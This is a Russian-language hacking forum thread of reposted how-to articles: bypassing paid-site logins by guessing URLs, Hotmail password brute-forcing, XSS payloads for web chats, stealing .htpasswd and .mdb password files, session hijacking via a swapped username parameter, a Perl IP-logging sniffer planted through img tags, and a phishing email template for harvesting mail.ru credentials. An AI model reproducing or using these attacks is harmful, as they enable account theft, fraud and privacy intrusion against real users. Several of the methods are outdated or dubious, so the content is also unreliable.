On-line: гостей 0. Всего: 0 [подробнее..]
АвторСообщение
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:40. Заголовок: }{/\|{EPC|{ИE CТАТЬИ!!


Здесь будет всё о хакерстве!!

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Ответов - 25 , стр: 1 2 3 All [только новые]


Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:52. Заголовок: Re:


ХАЛЯВА НА ПЛАТНЫХ СЕРВАКАХ!
Сегодня я расскажу про то как можно халявно влезть на платный сервак. Можно конечно пользоваться сгенеренными кредитками (кстати, в передачи "О, счастливчик!" по НТВ Дебров показывает кредитку. Запиши этот момент на кассету, а потом если внимательно вглядываться можно разглядеть ее номер и пользоваться:)), но я Тебя сегодня познакомлю с другими способами. Начнем с того что большинство сайтов запрашивают логин и пароль только на входе. Тоесть сам сайт хранится в какой-то папке и Тебе никто не мешает набрать в адресной строке браузера адрес на эту папку. Догадаться что это за папка сложно. Поэтому надо воспользоваться вспомогательным софтом. Я рекомендую GRINDER и BlackWidow. Есть и другой способ. Для этого Тебе просто понадобится прога для качания каталогами. Скачиваешь себе порносайт, открываешь его в проводнике. Или в Explorer'е, если у Тебя 95 винды и начинаешь просматривать картинки jpg и gif. Теперь давай представим что Тебе хочется в дальнейшем вернуться сюда. Тогда просто запоминаешь адрес странички с порнухой (разумеется той, которая стоит за чертой MEMBERS) и потом набрав эту строку в браузере Ты сможешь туда вернуться. Даже если срок оплаты истек. Лучше вообще не запоминать адрес а знести его в "Избранное". Допустим что Ты настолько крут, что раздобыл кредитку. Что дальше? А дальше топай на AdultCheck и регистрируйся там. После регистрации там они Тебе выдают ключ с которым Ты можешь лазить по туевой хуче сайтов. Давай рассмотрим еще один вариант пролазинья. Дело в том, что многие порносайты дают демо-доступ. Этим мы и воспользуемся. Рассмотрим пример с сайтом LiveTeen (мой любимый порносайт:)). Каждому какому-то посетителю они дают демо-вход. С этим демо-входом ты можешь у каждой бабы посмотреть по 15 фоток и несколько фоток из видео-файлов. Возьмем к примеру девку по имени Chloe. Адрес первой ее фоток выглядит таким образом: http://www.liveteen.com/*******/Chloe-Caprise/Chloe. Так вот в этой папке лежат файлы с именами chl001.jpg, chl002.jpg, chl003.jpg и так до chl015.jpg. А кто мне мешает ввести chl080.jpg? Да никто! тоже и с видео. Возьмем к примеру файл .../video/amanda/vid001.jpg. Просто меняем jpg на mov и вперед. Возьмем еще сайт "В постели с Аленкой". Он не платный, но чтобы узнать пароль надо где-то час лазать по разным баннерам, один из которых оказывается долбаным (битым, с ошибочным href="..."). на этом поиски пароля заканчиваются. Но нам дают демо вход для просмотра всех картинок в мелком формате. Адрес картинок .../small/*.jpg. Заменяем small на full и смотрим фоты в полнометражном формате. Я догадался что надо поставить слово full с третьего раза (на сайте было написано, что для полного доступа надо ввести пароль). Ну и все. Это не единственные способы, но их Тебе хватит. Ниодин сервак не устоит.

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:53. Заголовок: Re:


способа взлома HotMail
Существует несколько способов взломать hotmail. И одни из них приведены ниже . Помните, что эта информация - для образовательных целей !
I способ - Жесткий взлом .
a. Используйте telnet, чтобы соединиться с портом 110 (Hotmail_s сервером)
b. Напечатайте ПОЛЬЗОВАТЕЛЯ и затем имя пользователя жертвы
c. Напечатайте пароль и затем предположительный пароль
d. Повторяйте это до тех пор , пока не найдете правильный пароль.
!. Это называется жесткий взлом и требует терпения.

II способ - Лучший путь для взлома
a. Получите username жертвы (Оно обычно прописывается в начальной области адреса)
b. Имея его username напечатайте " www.hotmail.com/cgi-bin/start/victimsusername "
c. И вы в....,

III способ - Считается старым путем взлома
a. Пойдите на Hotmail_s homepage, и получите адрес (если у вас его еще нет)
b. Log out
c. Теперь напечатайте username жертвы .
d. Смотреть на source code.
e. В пятом ряде вы должны найти "action=someadress"
d. Скопируйте тот адрес и вставте его в область адреса
e. И вы в...

IV способ - Другой ...
a. Идите на hotmail_s homepage
b. Скопируйте исходный source code.
c. Создайте новый html файл с тем же самым содержимым, но измените method=post на method=enter
d. "Рассмотрите" страницу
e. Изменить адрес на www.hotmail.com/ (не нажимайте интер !)
f. Напечатайте жертву в его username и пароле
g. Посмотрите в область адреса. Там вы увидите ...&password:something ...
h. пользуйтесь на здоровье !

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:54. Заголовок: Re:


Еще раз о взломах HTML-чатов.
1. ЧАСТЬ ПЕРВАЯ, или показываем свое.

Основу интерфейса практически любого чата соствляют динамически генерируемые HTML-формы, связанные между собой посредством javascript. В практически всех чатах имя пользователя и пароль (или некий идентификатор, который генерируется при входе пользователя) хранятся внутри формы в качестве скрытого (hidden) элемента и могут извлекаются оттуда посредством скрипта. Заставив кого-либо из посетителей чата выполнить свой javascript, Вы можете, по сути, получить полный контроль над ним - сказать фразу от его имени или выдать его пароль.

Для человека, знающего хотя бы основы HTML и Javascript, не составит труда разобраться в структуре интерфейса чата, но вот подсунуть в эту структуру "троянский" скрипт - это проблема.

В простейшем случае, когда набираемый вами текст показывается в окне чата "как есть" - без какого-либо контроля - вы просто вводите текст вашего скрипта. Если возникает проблема с ограничением на длину строки - разбейте скрипт на несколько коротких функций.

Но в большинстве чатов все же имеется проверка, которая не дает ввод большинства "опасных" тегов, в т.ч. и <script>, либо запрещены теги вообще. Но тем не менее во многих случаях удается ее обойти. Ведь помимо тэга <SCRIPT> есть еще и казалось бы безобидные теги <A>, <IMG> <FORM> и другие, которые позволяют задать URL как javascript: или задать отклики объекта на события: OnClick, OnMouseOver и т.д.

Кроме того, теги могут проверяться в основном окне чата, но не контролироваться при вводе информации о пользователе. И можно вставить скрипт, например, в информацию о себе. Тогда тот участник чата, который имел неосторожность посмотреть вашу информацию получит вместо нее ваш скрипт. Например, следующий скрипт помещенный в личную информацию успешно работал на чате Copris (сейчас чат, похоже, накрылся, так что я смело его помещаю):

<script>
for( I=1 ; I<=11 ; I++ ){
if( I==1 ) alert( "Че те надо?????" );
else alert( "Я тя " + ( (I==11)? "последни" : I ) + "й раз спрашиваю - че
те надо???" );
}
alert("а здесь все равно нету нифика...");
top.frames['Inform'].document.forms[0].Accent.options[31].selected = 1;
top.frames['Inform'].document.forms[0].Announce.value = "Я люблю тебя,
DemoNitE!";
top.frames['Inform'].document.forms[0].submit();
top.frames['Dark'].document.forms[2].submit();
</script>

Этот безобидный скрипт дает alertы посетителю, после чего помещает признание любви к DemonitE от имени посетителя в общее окно чата. Это стимулирует остальных посетителей на просмотр личной информации о DemonitE. Тем не менее, скрипт можно было сделать и менее дружественным - например, посылать в приват пароль посетителя, который хранится в виде в виде скрытого элемента формы в каждом фрейме. Более того, можно было бы даже написать что-то типа вируса, который, например, меняет имя пользователя на "DemonitE" и ставит ему соответствующий пароль. Таким образом можно заразить всех участников чата. Изменение скрипта таким образом, чтобы высылать в приват пароль посетителя и превращать его в DemonitE (при этом все его сообщения будут исходить от DemonitE, но видеть сообщения для нее он не будет), требовало ровно пять дополнительных строчек на javascript (три на первое действие и два на второе).

Похожая дыра присутствует в очень многих чатах, где посетителю позволяют выбрать цвет или размер текста. Как правило, вводимые им значения цвета не проверяются. Напрямую, или путем модификации странички, сохранив ее на диске (в том случае, если цвет предлагают не ввести и выбрать из набора), можно, например, в качестве цвета вместо любимого значения 'black' задать '><script' (если таг печатается в чате как <FONT COLOR=black> Если печатаются кавычки (COLOR="black"), то задача несильно усложняется - надо всего лишь их нейтрализовать, например '"><script p="'.

Как правило, тип шрифта указывается непосредственно перед фразой введенной посетителем. Так что в своей фразе вы теперь смело можете писать любой скрипт! Так мы имеем возможность закинуть Javascript в общее окно чата, что открывает обширные возможности... Но, нужно отметить, что засунуть закрывающий таг тоже может быть достаточно сложно, а без этого скрипт работать не будет. Впрочем, иногда скрипт просто удается засунуть в COLOR целиком.

2. ЧАСТЬ ВТОРАЯ, или смотрим чужое.

И, наконец, существует несколько способов простого хищения паролей из чатов. Если чат расположен на сервере apache, и проверяет имена пользователей по файлу htpasswd (при этом ваш браузер выкидывает окошко с предложением ввести имя и пароль для доступа к ресурсу), то всегда есть вероятность, что нерадивые администраторы положили его в доступный каталог. Можно для этого воспользоваться URL типа http://www.somechat.com/chat/.htpasswd. Точное расположение файла можно узнать стянув файл .htaccess из данной директории. Это, обычно не удается. Но часто удается стянуть его копию, которая осталась с последнего редактирования файла, например http://www.somechat.com/chat/.htaccess~ или http://www.somechat.com/chat/.htaccess.old (в том случае, если копии этих файлов любезно оставлены администратором).

Если чат расположен на Микрософтовском сервере и использует ODBC для доступа к базе данных паролей, то можно попытаться стянуть файл с базой, например если она имеет формат Microsoft Access и хранится в том же каталоге, то достаточно просто угадать ее имя, чтобы получить полную информацию обо всех пользователях вместе с паролями :) Классический пример - чат "Пластилин" (я уже послал уведомление администраторам чата): http://www.plastilin.nnov.ru/talkzone/talkzone.mdb

Следует сразу заметить, что почти все сказанное выше справедливо не только для HTML-чатов, но и для других WEB-сервисов, таких как доски объявлений (WWW-boards) или гостевые книжки (Guestbooks).

DemonitE[RAH]

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:55. Заголовок: Re:


Имеем навароченный чат на примере www.klinnet.ru.
В принципе, статья посвящена некоторым уязвимостям, которые могут скрываться во всяких дополнительных (и кстати совершенно ненужных) фишках веб чатов, таких как комнаты, смена цвета шрифта, пароли и тд. Для примера возьмём чат на сервере www.klinnet.ru. Давай повнимательнее изучим нижний фрейм (input frame). Сразу бросается в глаза огромное кол-во скрытых полей. TYPE="hidden" NAME="Ign" VALUE="" Это функция игнора (очень даже полезная вещь). TYPE="hidden" NAME="N" VALUE="20" А это кол-во строк, которые выводятся на экран. Самое интересное, что эти фишки юзаются командами. Короче, ирк форэвэ. А вообще, чат расчитан на большое кол-во народа, причём _разных_национальностей_ (TYPE="hidden" NAME="L" VALUE="russian"). Моё мнение: чат был написан 100%нтно не любителями-програмистами, а серьёзной забугорной фирмой, скорее всего с коммерческими целями. То есть защита обещает быть крутой. Ладно, знакомство с чатом закончено, давай теперь посмотрим насколько наши забугорные друзья продвинулись в плане безопасности. При входе каждому юзеру присваивается идентификатор (его хешированный пароль; прописан в нижнем фрейме), так что от лица других юзверей, не зная их идента, говорить не получится. Символы < и > преобразуются в < и > соответственно. Так что и теги не вставишь. Ну как? Впечатляет? Где-то года два назад трудно было найти чат с такой защитой. Ну всё, защиту мы рассмотрели. Приступим, пожалуй, непосредственно к главной теме статьи. Продолжаем изучать нижний фрейм. Видишь там такой уродливый набор цветов? Наведи мышь, к примеру, на ярко красный цвет (самый левый) и вглядись в тот url, на который он ссылается: http://www.klinnet.ru/chat/input.php3?From=..%2FphpMyChat.php3&Ver=H&L=russian&U=D4rkGr3y&R=KlinNet&T=1&D=10&N=20&O=0&ST=1&NT=1 Подумай, почему такая длинная ссылка? Да потому, что при нажатии на эту кнопку нижний фрейм как бы _перезапускается_ с новыми параметрами. Проще говоря, обновляются ВСЕ параметры вместо одного. То есть, если в параметре "U" пропишем вместо "D4rkGr3y" имя другого юзера, то мы _не_поменяем_ему_цвет_, а как бы перезайдём без авторизации под его ником. Как следствие сможем базарить от его лица и узнаем его хешированный пароль. В чём проблема? Да в том, что pwd_hash нужно было проверять.. Кстати говоря, этот баг почти сразу заделали и мне пришлось искать новые...Они нашлись =) (последующие два бага на момент написания статьи были не заделаны) Вглядись в правый фрейм. Что ты там видишь? Кнопку "Выход"? Да, я тоже её вижу. Здесь в принципе уязвимость такого же рода. Вот на что ссылается "Выход": http://www.klinnet.ru/phpMyChat.php3?Ver=H&L=russian&U=D4rkGr3y&E=KlinNet&EN=1 И опять pwd_hash не проверяется. Как следствие, подменив ник, можем кикать бедных юзеров. Ну и последний, наиболее крутой баг. Ты наверное уже заметил, что чат поддерживает создание нескольких комнат. Заметил? Так вот меня во всём этом бесило то, что нельзя сидеть одновременно в двух комнатах, то есть или в той, или в этой. Посмотри, что происходит, когда ты переходишь из одной комнаты в другую? Вот как выглядит ссылка на переход в другую комнату: http://www.klinnet.ru/phpMyChat.php3?Ver=H&L=russian&U=D4rkGr3y&R0=KlinNet&T=1&D=10&N=20&E=fuck&EN=1 Полностью перегружаются все три фрейма, плюс к этому не проверяется pwd_hash. Спросишь, что нам это даёт? Да всё! Полный контроль над любым юзером! Подменив его ник, можем говорить от его лица, _слушать_его_приваты_ (так как центральный фрейм тоже обновляется), редактировать все его настройки (в том числе и пароль). Вот так.. Ну и напоследок, в чём же основные проблемы чата? Во-первых, хеш надо проверять ВЕЗДЕ, а во-вторых, не понимаю, зачем при изменении какого-то одного параметра, обновлять все? Если бы все не обновлялись, баги с комнатами и изменением цвета нам вообще ничего серьёзного бы не давали...

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:55. Заголовок: Re:


Что можно сделать с IP адресом!
Как известно, Internet основана на семействе протоколов tcp/ip, определяющих, каким образом осуществляется взаимодействие между подключенными к сети компьютерами. Идентификация этих компьютеров осуществляется с помощью так называемых IP-адресов, каждый из которых представляет собой уникальный 32-битный идентификатор, обычно записываемый в виде четырех десятичных чисел, например, 192.168.0.1. И с точки зрения адресации сервер, обрабатывающий ежесекундно тысячи запросов практически ничем не отличается от вашего компьютера, подключаемого к сети по dial-up. Единственная разница домашний пользователь, как правило, получает так называемый динамический ip-адрес, меняющийся от подключения к подключению.
В то время как адрес сервера должен быть доступен всем клиентам, желающим воспользоваться его услугами, клиент вовсе не обязан афишировать свой адрес на каждом углу. Более того, обнародование ip-адреса может привести к весьма серьезным последствиям.

Что можно сделать с человеком, зная его ip-адрес? Ну, например, если на его машине с Windows'95 живет NetBIOS over IP, и разделены для доступа по сети, да еще и без паролей, некоторые диски, то довольно много :) (для заинтересовавшихся - помочь здесь могут nbtstat, lmhosts и net use). Правда это не слишком часто встречается у dial-up пользователей. Другой пример - в прошлом году были найдены дыры в IE и NN, позволяющие получить доступ к файлам клиента. Дырки те, правда, уже прикрыли, но кто знает, сколько их еще осталось.

До сих пор пользуются популярностью в определенных кругах программы, объединяемые общим названием (восходящего к первой программе этого класса - Winnuke), которые осуществляют атаки типа Denial of Service, приводящие к зависанию или отключению от сети атакуемого компьютера.

Нежно любимая миллионами пользователей ICQ (http://www.icq.com) тоже оказалась не без греха. На странице Fyodor's Exploit world (http://www.dhp.com/~fyodor/sploits.html) помимо прочего приведена информация о слабостях ICQ-шного протокола (http://www.dhp.com/~fyodor/sploits/icq.spoof.overflow.seq.html), которые уже позволили создать многочисленные программы, делающие жизнь пользователя ICQ не слишком пресной. Так, например, на странице ICQ Snoofer Team (http://const.ricor.ru/~icq/) предлагается опробовать программу, позволяющую слать сообщения по ICQ с чужого UIN. Snoofer существует в двух вариантах - в виде скрипта, доступного со страницы, и в виде программы, которую обещают рассылать по почте. Для его использования достаточно знать ip-адрес адресата, номер порта, на котором висит ICQ, и UIN отправителя. Инструкция прилагается. Впрочем, все эти веселые программы пригодны в основном для деструктивной деятельности, особого смысла, в которой я не вижу (кстати, запущенное на нашем сервере голосование по поводу "нюков" показало, что большинство посетителей со мной солидарно).
Посмотрим, какие действия можно предпринять для определения и скрытия ip-адреса.

Абсолютных рецептов, конечно, не существует, можно говорить лишь о наиболее распространенных случаях. Вообще говоря, ваш IP-адрес может засветиться в огромном количестве мест. Другое дело - как его потом оттуда вытащить. Скажем, ваш любимый броузер при заходе на любую страницу сообщает о себе достаточно много информации.

В качестве простой демонстрации приведу скрипт на Perl'е, выводящий основную информацию о посетителе страницы:

Листинг 1. showuser.pl

#!/usr/bin/perl
print ("Content-type: text/html\n\n");
@ee=(
"CHARSET",
"HTTP_USER_AGENT",
"HTTP_REFERER",
"REMOTE_ADDR",
"REMOTE_HOST"
);
foreach $e(@ee)
{
print "$e: $ENV{$e}
\n";
}


Вообще-то это самый безобидный случай обнародования ip-адреса (разве что если допустить злой умысел веб-мастера, установившего скрипт, атакующий посетителя, но вероятность целенаправленной атаки ничтожно мала).

IP-адрес отправителя можно вытащить из заголовка полученной электронной почты (Скорее всего, он будет лежать в последнем поле Received:, в отличие от поля From: его подделать чуть сложнее). Если у вас динамически выделяемый адрес, то подобная ситуация не слишком опасна. Хуже, если адрес постоянный, что, правда, встречается, но реже.

Самыми опасными с точки зрения обнародования ip-адреса оказываются всевозможные системы для интерактивного общения - IRC (командой /whois), InternetPhone, ICQ и т.д. Справедливости ради надо заметить, что некоторые из них пытаются прикрыть адрес пользователя (скажем, в MS Comic Chat показывается только часть адреса, в ICQ'98 появилась возможность скрытия своего адреса, не слишком правда хорошо работающая при общении со старыми версиями), но в большинстве систем адрес лежит совершенно открыто. Что же касается html-чатов, здесь все зависит от желания разработчика, принципиальная возможность показа ip-адреса существует, как это было продемонстрировано чуть выше.

Идея следующая: если в чате разрешен ввод тегов html, никто не помешает вставить в свое сообщение что-то типа В итоге все присутствующие в чате (даже не зарегистрировавшиеся) будут, сами того не ведая, вызывать скрипт sniffer.cgi. Ну а остальное уже дело техники, реализация подобного скрипта на Perl'е, ведущего лог всех обращений, займет несколько строчек. Демонстрационный вариант этого скрипта доступен на www.hackzone.ru/cgi-bin/sniffer.cgi

Способ применения очень прост - вы вставляете в свое сообщение текст наподобие следующего:

<img src=http://www.hackzone.ru/cgi-bin/sniff.cgi?id>, где id - идентификатор канала (помогает не запутаться при использовании скрипта на разных чатах разными людьми).

Если этот чат поддерживает вставку html-тегов, то скорее всего вы увидите анимированный логотип HackZone. Все, что теперь осталось - просмотреть лог (http://www.hackzone.ru/files/snifflog.txt), в который пишется дата обращения к скрипту, ip-адрес и идентификатор id.

Поскольку речь идет о демонстрации, в логе хранятся только 30 последних записей.

Листинг 2. sniffer.pl

#!/usr/bin/perl
$log = "/local/path/on/your/server/snifflog.txt";
$now_string = localtime;
@thetime = split(/ +/,$now_string);
@theclock = split(/:/,$thetime[3]);
$ampm = 'am';
if ($theclock[0] > 11)
{ $ampm = 'pm'; }
if ($theclock[0] == 0)
{ $theclock[0] = 12; }
if ($theclock[0] > 12)
{ $theclock[0] -= 12; }
else
{ $theclock[0] += 0; }
$lnum=$ENV{'QUERY_STRING'};
open (DB, "$log") || die "Can't Open $log: $!\n";
flock(DB, 2);
@line=;
flock(DB, 8);
close(DB);
$line0="[$thetime[0] $theclock[0]\:$theclock[1]$ampm] (".$lnum.") ".
$ENV{REMOTE_ADDR}." ".$ENV{REMOTE_HOST};
$maxline=@line;
$maxline=30 if ($maxline>30);
open (DB, ">$log") || die "Can't Open $log: $!\n";
flock(DB, 2);
print DB ("$line0\n");
for ($i=0; $i
Теперь немного о том как же защититься от всего этого безобразия. Самый простой способ прикрыться при прогулках по Web - воспользоваться proxy либо службой
наподобие Anonymizer, Inc.(http://sol.infonex.com/). Принцип их работы аналогичен - вы напрямую
общаетесь только с proxy-сервером, а черную работу по заходу на сайты он делает за вас.

Хуже всего дело обстоит с чатами. Проблема в том, что если найти какой-нибудь левый прокси для www достаточно легко, подобный сервис для irc, icq и иже с ними встречается, мягко говоря, очень редко и для простого dialup-пользователя практически недоступен. Именно поэтому большая часть средств для атаки по ip заточена под всевозможные irc-клиенты. Так что бороться тут можно лишь двумя способами. Самый надежный - не использовать их вообще. Более реалистичный - бороться не с причиной, а со следствиями - разыскать свежайшие заплаты и надеяться, что против вашей брони еще не изобрели подходящей пушки.

Заинтересовавшимся вопросом приватности в Интернет могу порекомендовать очень хороший сайт "Privacy Issues: Частная жизнь в Интернете" (http://www.tamos.com/privacy/ru/), целиком посвященный этой теме. Помимо вопросов анонимности в WWW и IRC (расписанных весьма подробно), здесь рассматриваются способы установления личности по адресу электронной почты, даются краткие рекомендации по использованию криптографических средств, здесь же программа для подсматривания ввода с клавиатуры, несколько приятных ссылок и т.д.

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
постоянный участник




Пост N: 4
Зарегистрирован: 01.01.07
Рейтинг: 0
ссылка на сообщение  Отправлено: 01.01.07 20:58. Заголовок: Re:


Взлом почты или Идеальной защиты не существует

Самый распространённый способ. Основывается на следующем. Все мы с вами люди, так? У нас у всех одинаковые слабости, недостатки, все мы делаем чисто человеческие ошибки. Вот на этом-то и основана наука славная социальная инженерия. Так, короче. Хакер может написать жертве письмо примерно такого содержания:
"Почтовая служба @mail.ru проводит чистку аккаунтов. Если Вы не хотите, чтобы ваш аккаунт был удалён, ответьте на это письмо указав в поле "Тема" Ваш логин и пароль в следующем формате: username; password"
Спросишь, почему именно в поле тема? Отвечаю. Конечно, это совсем не обязательно. Просто жертва будет думать, что письмо для автоматической обработки получит робот, а к роботу больше доверия. Вместо чистки аккаунтов можно придумать что-нибудь другое: мол, с вашего ящика идёт рассылка вирусов/спама, вышлите пароль, в противном случае ваш аккаунт будет удалён... Короче, можно дохрена всего придумать.. Гм, чуть не забыл! Письмо может быть написано с правдоподобного мыла, типа admin@mail.ru, support@mail.ru, webmaster@mail.ru... Также, хакер можнет воспользоваться каким-нибудь анонимайзером или послать письмо telnet-клиентом, указав в заголовке "адрес ответа"(reply-to) своё мыло. Таким образом, в поле "от кого" жертва видит, например admin@mail.ru, но при ответе на письмо ответ уйдёт на указанный e-mail.

Злоумышленник может зарегистрировать где-нить, на народе например, страничку с заголовком типа "Ломаем чужое мыло" и отправить жертве ссылку якобы на хакерскую страничку... На самой страничке может находится текст типа:
"На mail.ru несколько МИЛЛИОНОВ пользователей. Есть процент, который имеет слабую память и тупые мозги, чтоб запомнить свой пароль и частенько эти перцы сталкиваются с проблемой забывания пароля Итак, даже небольшой процент от более чем милионной толпы владельцев мыльниц - это тоже своеобразная толпа, которая требует свои пароли. Существуют всякие системы аля "Забыл пароль" в котором вас спрашивают ответ на секретный вопрос, данные, которые Вы вводили при регистрации и т.п. Но самое интересное, что этим занимается не человек, а машина, т.е. обычная программулина !!!! А если есть программа - есть в ней дыра. Теперь приступим к описанию конкретных действий.
Тут все просто. По адресу pass_repair@mail.ru сидит mail-робот, который анализирует запросы на восстановление пароля и в зависимости от этого либо уточняет ваши данные, либо сразу шлет пароль. На сайте есть форма для заполнения с всевозможными параметрами, которая потом шлется роботу со специальным Subject'ом. Фишка в том, что если в сабжект впихнуть не один, а два запроса, то проверятся будет последний ящик, а информация будет выслана для второго! Так шевелим мозгами... Правильно! Высылаем два запроса: в одном сообщаем инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем ;) )

Итак, мы хотим обломать vasya_pupkin@mail.ru
Наш ящик hacker@mail.ru пароль qwerty
Пишем письмо роботу на pass_repair@mail.ru
Subject: login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=

Т.е. первый раз вставляем в тему письма запрос о ящике-жертве - vasya_pupkin@mail.ru : login=vasya_pupkin&pass=&answer=
А потом, через точку с запятой второй запрос, с вашими данными, которые робот проверит и убедится, что они правильные!
login=hacker&pass=qwerty&answer=
Итого : тема сообщения выглядит вот так :
login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=
Все, ждите пасс на ваше мыло!!!"


Заметил подвох? молодец! для "невъехавших" объясню... хакеру достаточно создать свой ящик на почтовом сервере с именем типа pass_repair@mail.ru. Теперь пароли целой стаей летят к нему на мыло! Понял? Ну а дальше ему главное не зевать.. просто быстро поменять секретный пароль/ответ, адрес пересылки(причем ~99%, что там пасс такой же!)

c@sillias

Спасибо: 0 
ПрофильЦитата Ответить
администратор




Пост N: 161
Зарегистрирован: 02.05.06
Откуда: РОССИЯ, Калининград
Рейтинг: 0
ссылка на сообщение  Отправлено: 01.01.07 21:17. Заголовок: Re:


c@sillias пишет:

 цитата:
Заметил подвох? молодец! для "невъехавших" объясню... хакеру достаточно создать свой ящик на почтовом сервере с именем типа pass_repair@mail.ru. Теперь пароли целой стаей летят к нему на мыло! Понял? Ну а дальше ему главное не зевать.. просто быстро поменять секретный пароль/ответ, адрес пересылки(причем ~99%, что там пасс такой же!)

c@sillias



pass_repair@mail.ru - так он же уже будет занят, если такой адрес уже существует у робота...

Вот так и живём... Спасибо: 0 
ПрофильЦитата Ответить
постоянный участник




Пост N: 6
Зарегистрирован: 01.01.07
Рейтинг: 0
ссылка на сообщение  Отправлено: 04.01.07 17:29. Заголовок: Re:


Djeraldo пишет:

 цитата:
pass_repair@mail.ru - так он же уже будет занят, если такой адрес уже существует у робота...


У робота - support@mail.ru

Спасибо: 0 
ПрофильЦитата Ответить
администратор




Пост N: 172
Зарегистрирован: 02.05.06
Откуда: РОССИЯ, Калининград
Рейтинг: 0
ссылка на сообщение  Отправлено: 05.01.07 01:36. Заголовок: Re:



 цитата:
pass_repair@mail.ru

наврядли...

Тебе сюда учиться уму разуму.

Вот так и живём... Спасибо: 0 
ПрофильЦитата Ответить
постоянный участник




Пост N: 12
Зарегистрирован: 01.01.07
Рейтинг: 0
ссылка на сообщение  Отправлено: 06.01.07 12:31. Заголовок: Re:


Мля, там не только этот способ у меня описан...

Спасибо: 0 
ПрофильЦитата Ответить
Ответов - 25 , стр: 1 2 3 All [только новые]
Ответ:
1 2 3 4 5 6 7 8 9
большой шрифт малый шрифт надстрочный подстрочный заголовок большой заголовок видео с youtube.com картинка из интернета картинка с компьютера ссылка файл с компьютера русская клавиатура транслитератор  цитата  кавычки моноширинный шрифт моноширинный шрифт горизонтальная линия отступ точка LI бегущая строка оффтопик свернутый текст

показывать это сообщение только модераторам
не делать ссылки активными
Имя, пароль:      зарегистрироваться    
Тему читают:
- участник сейчас на форуме
- участник вне форума
Все даты в формате GMT  3 час. Хитов сегодня: 13
Права: смайлы да, картинки да, шрифты да, голосования нет
аватары да, автозамена ссылок вкл, премодерация откл, правка нет